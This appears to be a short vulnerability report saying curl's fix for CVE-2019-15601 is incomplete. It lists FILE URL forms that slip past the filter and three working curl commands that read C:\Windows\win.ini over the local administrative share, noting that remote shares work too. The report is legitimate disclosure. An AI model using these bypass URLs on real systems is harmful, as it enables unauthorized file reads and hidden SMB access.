The released fix for CVE-2019-15601, SMB access smuggling via FILE URL on Windows, leaves curl still vulnerable to SMB access smuggling via FILE URLs.
file:////smb_server/smb_share/file
are not filtered.file:///%3f%3f/UNC/smb_server/smb_share/file_name
or file:///%3f%3f/GLOBAL/UNC/smb_server/smb_share/file
are not filtered.curl file:////localhost/c$/windows/win.ini
curl file:///%3f%3f/UNC/localhost/c$/windows/win.ini
curl file:///%3f%3f/GLOBAL/UNC/localhost/c$/windows/win.ini
The above examples will return the contents of C:\Windows\win.ini utilizing SMB to fetch the file via the local administrative share for the C drive. This will also work with remote shares.
A properly crafted URL could cause a user to unknowingly access a remote file.